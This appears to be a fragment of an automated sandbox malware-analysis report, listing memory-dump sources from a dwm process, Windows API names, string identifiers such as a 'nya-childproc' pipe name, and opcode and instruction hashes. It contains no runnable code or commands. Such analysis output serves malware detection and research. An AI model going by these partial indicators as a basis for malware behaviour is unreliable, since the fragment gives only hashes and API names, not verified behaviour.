                                                          • Instruction Fuzzy Hash: DFD16B33604B808AEB60DF65984839D77B0F749788F200215EECD5BF9AEB36C991C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: b0034ac9fedc59078a8a7e47df2050e133f12344030f0136cfb4ee7b62c8714e
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: E4D1AD32605B808AEB60DF65D4C93AD77B0F789798F201106EECD97B9AEB75C090C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: 909d86dbda564d8ae0b421eb3c3f6f7ec98a6f59c67c63f828dfe73cbda2f20a
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: 94D1C332604781A6EB70DF65D4893AD37B0F789788F280205EEC957F9ADB35C990C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: ff44b09a0e5900bdfd36588edc80063c4c1a57645fcaaa8ff3b51a3e619e5fa7
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 70D17D32644B84AAEBB0DF65E44839D77B0F795798F200215EACD57F9ADB38C890C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 7d35aa4cd65ea18dbe7087ca25c91ca97611a09d7381d338ecd8174d597b1ed3
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 05418173214B80D6E760CF21E44839E77B1F388B98F548119DA8D17B98EF39C949CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 821efa7a87f1f50bac588274c9b0c3efeb7920b4f048bae8d207b7b93b507985
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 8B417133214B84D6E7A4CF61E44839E77B1F388B98F548119DA890BB58DF3CC589CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: 1f079ead6b2a2b9e77380c9f466fe227c451bb9cdf891b07d463228648f3c048
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 8F114976614B4082E7109B25F85835A7770F389BE4FA44315EA9D03AA8DF3CC258CB55
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 7f99631df70bc27f49c937bf693204d986050030828864c49767fd9d7b1a80e9
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 1A81812361024186FA5CAB6698C93997FF1AF867C0F44412BDB08C7796DB3BC945C7A3
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: b2ee973e34825ad9dca60c71bed8b459903fc17ef75a7d459709b68d4c84bc08
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: E781F1257002418AFA50AB659C5D3A973B1AB85B84F748415AACC67FD6FB3BCD41C333
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 044a2af7b68ccd40a4f16dcda0e18dde777fe5d8773e7e20f0072ecd4716c4b0
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: E981C020B022414AFB64AB6598CD3AD37B0AB86780F7451A79ACCC77D6DB38C855C773
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: e312396b39606af4d997e29cc141288cd9959707db47f0e5c049d50a50ee6aed
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 3D81CF217006427AFA74AB65984D39B73F1AB86B80F7C4115AEC947F96DB39C842C723
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 0693b83c5bc9acea3d2881afc43fa6cc3fc49127075a1a3dfe8cc688cbd48b08
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: ED810520780681B6FAF0BB65945D36973B0AB96781F744015AAC847FD7EB38C885C737
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99B31
                                                          • GetLastError.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99B69
                                                          • FreeLibrary.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 01f312c05cdd55351d2ac3ba235fd760506b2fe5af5c8cc90a55e232e2a4baf9
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 9331A12131264092EE11AB16AC887A533F4BB44BA8F790625ED9D47B90FF3DC854C322
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09B31
                                                          • GetLastError.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09B69
                                                          • FreeLibrary.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 9d42ed71ee45f3b4d5c1312fa78594dba90501ccc8d2a55312c04eb523f1c0fc
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: F331A321352A40A1EEB1DF4698087A533B4B794BB0F690625DD9D4BB94EF39CC44C726
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: e1abb664a91a57423b12d2f494e3f1e41a9cdc7a412b6d31af6d9dae86cd6057
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: 4911BF31310B8086E7509B52E85871D77B1F388FE4F604624EA9E87BD4DF78CA24C755
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: a919c63cfe1eb2905e8ec9dc5028b144f8b95960abdd6eb95fa4e46fe3bcec8f
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: B7119D31310B4096E7609B92E85871977B0F398BE4FA00224EA9E87FD4DF3CC848C751
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: 649c0a22422b02da4e256086d10b0a5bdd3e1d142a559b51b9722f9d04f35645
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 87D19D76244B8895DAB0DB0AE49835A77B0F3C8B98F200126EACD47FA9DF3DC551CB51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 5d987100bd7a9682b01af306e397790e2a51e6df67ab5f07f856803d75bedfc2
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: E351A531201B4595FF05EB29EC9829833B1FB44744FA40929A5AD07BA5FF7AC929C372
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 2d31f3d6e6c5a3b540286d699732f80ee8b7a5f3e1ae2d2c891674388e650171
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: E231AE22701B5192EB15DF26E948369B3B1FB84B84F2844248F8C47B55FF39C861C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                           • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: ae2828988b5da7c2c292b1821a15e89ffa856a4605bcba0e02ad8e018266d514
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: BE31AB22701B51A2EAB5DF26F948329B3B0FB54B84F2880208FC907F55EF38C5A5C721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                           • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: ed1152b422595425cd4bd64c1d17a41f84522a149bdacc2ff6543c64706649a6
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: 2A114F2170124092FA1867316E1D37E3372AB85794F784624A8EE57BC6EF39CD11C322
                                                          APIs
